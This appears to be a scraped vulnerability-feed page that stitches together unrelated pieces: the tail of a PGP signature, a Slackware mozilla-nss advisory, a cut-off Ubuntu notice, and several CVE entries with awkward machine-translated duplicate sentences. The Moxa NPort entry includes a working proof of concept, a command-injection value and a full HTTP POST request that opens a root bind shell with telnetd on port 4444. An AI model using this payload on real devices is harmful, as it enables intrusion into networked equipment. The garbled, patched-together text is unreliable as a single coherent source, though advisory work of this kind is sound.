ZLZftXKCLD/Lwb55uDzJHBhSkhCOyBCwNMj2j261keB+X8EuxI8UcnmGR87xTHnd
QaZUxlEVzc2ZfCFl2LttiT+v0F1FlbmKkqLlXh7DU5Z05f4evtmQ9D17aQzRNDHL
wSLYXpOCaSY&NJ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/mozilla-nss-3.40.1-i586-1_slack14.2.txz: Upgraded.
Upgraded to nss-3.40.1 and nspr-4.20.
Mitigate cache side-channel variant of the Bleichenbacher attack.
For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12404
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-nss-3.23-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-nss-3.23-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-nss-3.40.1-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-nss-3.40.1-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-nss-3.40.1-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-nss-3.40.1-x86_64-1_slack14.2.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/mozilla-nss-3.40.1-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/mozilla-nss-3.40.1-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
477aad77295cdad06550ec789db125ed mozilla-nss-3.23-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
da2b0d54d5bab3d60766691fefbfe59e mozilla-nss-3.23-x86_64-1_slack14.0.txz
Slackware 14.1 package:
2b87e41ebe92bb411f9ba6c7b3dc90a3 mozilla-nss-3.40.1-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
97f5628b15deea966d2e3a53cbf63e41 mozilla-nss-3.40.1-x86_64-1_slack14.1.txz
Slackware 14.2 package:
6d3340c45970475bc3aa8329f82c8f1c mozilla-nss-3.40.1-i586-1_slack14.2.txz
Slackware x86_64 14.2 package:
0b07bd47fca120a143111804aa70bdd3 mozilla-nss-3.40.1-x86_64-1_slack14.2.txz
Slackware -current package:
3b130c0c68b8283c5e243a5a23cfa368 l/mozilla-nss-3.40.1-i586-1.txz
Slackware x86_64 -current package:
7191a0d1e6d618e89a0e5014bde3f29e l/mozilla-nss-3.40.1-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg mozilla-nss-3.40.1-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. ==========================================================================
Ubuntu Security Notice USN-3850-2
February 18, 2019
nss vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
Several security issues were fixed in NSS. This update provides
the corresponding update for Ubuntu 12.04 ESM.
Original advisory details:
Keegan Ryan discovered that NSS incorrectly handled ECDSA key
generation. A local attacker could possibly use this issue to perform
a cache-timing attack and recover private ECDSA keys. (CVE-2018-0495)
It was discovered that NSS incorrectly handled certain v2-compatible
ClientHello messages. A remote attacker could possibly use this issue
to perform a replay attack. (CVE-2018-12384)
It was discovered that NSS incorrectly handled certain padding
oracles. A remote attacker could possibly use this issue to perform a
variant of the Bleichenbacher attack
| VAR-201812-0557 | CVE-2018-19660 | Moxa NPort W2x50A In product firmware OS Command injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
An exploitable authenticated command-injection vulnerability exists in the web server functionality of Moxa NPort W2x50A products with firmware before 2.2 Build_18082311. A specially crafted HTTP POST request to /goform/webSettingProfileSecurity can result in running OS commands as the root user. Moxa NPort W2x50A Product firmware includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Exploitation required authentication. This is similar to CVE-2017-12120.
Proof-of-concept:
1. Authenticate to Moxa NPort W2x50A device.
2. Go to Main menu a System Management a Maintenance a Ping a Destination
3. Enter ;telnetd -l/bin/sh -p4444&;. in 'Destination' field
4. Exploitation required authentication.
Proof-of-concept (sample HTTP request opening bind shell on port 4444):
POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1
Host: {IP:PORT}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SessionID={YOURSESSIONID}
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 309
Authentication=3&EAP_method=1&Username= ;telnetd -l/bin/sh -p4444&;
These vulnerabilities were fixed in the firmware version 2.2 Build_18082311.
https://www.moxa.com/support/download.aspx?type=support&id=14781
Best regards,
Maksim Khazov
| VAR-201811-0567 | CVE-2018-7811 | plural Modicon Vulnerability related to password management function in products |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
An Unverified Password Change vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 which could allow an unauthenticated remote user to access the change password function of the web server. plural Modicon The product contains a vulnerability related to the password management function.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Schneider Electric Modicon M340 and other are programmable logic controller products of Schneider Electric (France).
A number of Schneider Electric products have licensing issues. An attacker could use the / unsecure / embedded / builtin endpoint to exploit this vulnerability to change a user's password without authentication
| VAR-201901-0829 | CVE-2018-16183 | Panasonic applications register unquoted service paths |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
An unquoted search path vulnerability in some pre-installed applications on Panasonic PC run on Windows 7 (32bit), Windows 7 (64bit), Windows 8 (64bit), Windows 8.1 (64bit), Windows 10 (64bit) delivered in or later than October 2009 allow local users to gain privileges via a Trojan horse executable file and execute arbitrary code with eleveted privileges. Some pre-installed applications on Panasonic PCs register Windows services with unquoted file paths (CWE-428). Panasonic Corporation reported this vulnerability to JPCERT/CC to notify users of its solution through JVN. JPCERT/CC and Panasonic Corporation coordinated under the Information Security Early Warning Partnership.If a malicious executable is placed on a certain path, it may be executed with the elevated privilege. PanasonicPC is a computer device from Matsushita Electric Industrial Co., Ltd. of Japan. An attacker could exploit the vulnerability to execute files with elevated privileges
| VAR-201811-0569 | CVE-2018-7831 | plural Modicon Product cross-site request forgery vulnerability |
CVSS V2: 4.3 CVSS V3: 8.8 Severity: HIGH |
An Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 allowing an attacker to send a specially crafted URL to a currently authenticated web server user to execute a password change on the web server. plural Modicon The product contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SchneiderElectricModiconM340 and others are programmable logic controller products from Schneider Electric of France
| VAR-201812-0945 | CVE-2018-7987 | Huawei P20 Smartphone out-of-bounds vulnerability |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
There is an out-of-bounds write vulnerability on Huawei P20 smartphones with versions before 8.1.0.171(C00). The software does not handle the response message properly when the user doing certain inquiry operation, an attacker could send crafted message to the device, successful exploit could cause a denial of service condition. HuaweiP20 is a smartphone of Huawei. HuaweiP20 has a memory write cross-border vulnerability. The successful use of this vulnerability can cause the mobile phone to refuse service